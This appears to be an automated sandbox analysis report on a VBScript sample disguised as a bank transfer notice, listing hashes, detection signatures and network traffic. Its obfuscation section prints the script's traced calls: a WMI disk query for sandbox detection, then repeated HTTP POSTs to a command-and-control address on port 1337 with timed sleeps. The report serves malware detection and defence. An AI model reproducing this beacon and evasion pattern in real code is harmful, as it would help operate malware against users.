Windows Analysis Report
transferencia realizada.vbs

Overview

General Information

Sample name: transferencia realizada.vbs
Analysis ID: 1524394
MD5: fe893f789402eafdc09336f38f8de977
SHA1: 2360cdc1b14776d0463835fa440ba12a7d131a2f
SHA256: ceca7c78597817148e841c0744f96167e67bb3e08244e923b44006f5768bf0fe
Tags: vbsuser-N3utralZ0ne
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 95.7% probability

Networking
barindex
Potential malicious VBS script found (has network functionality)
Source: Initial file: xx.SetRequestHeader "User-Agent", gg
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 1337
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49700 -> 185.244.29.74:1337
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown HTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:1337Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74/:
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp, transferencia realizada.vbs String found in binary or memory: http://185.244.29.74:1337/document
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document-E
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document-L
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document.L
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document2
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/documentY
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/documentZ
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document_q
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/documentfE
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD123C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/documentp
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: transferencia realizada.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal76.troj.evad.winVBS@1/0@0/1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs"
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServe

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 1337
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWZN
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.244.29.74
 unknown Netherlands
209623 DAVID_CRAIGGG true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.244.29.74:1337/document true
    		unknown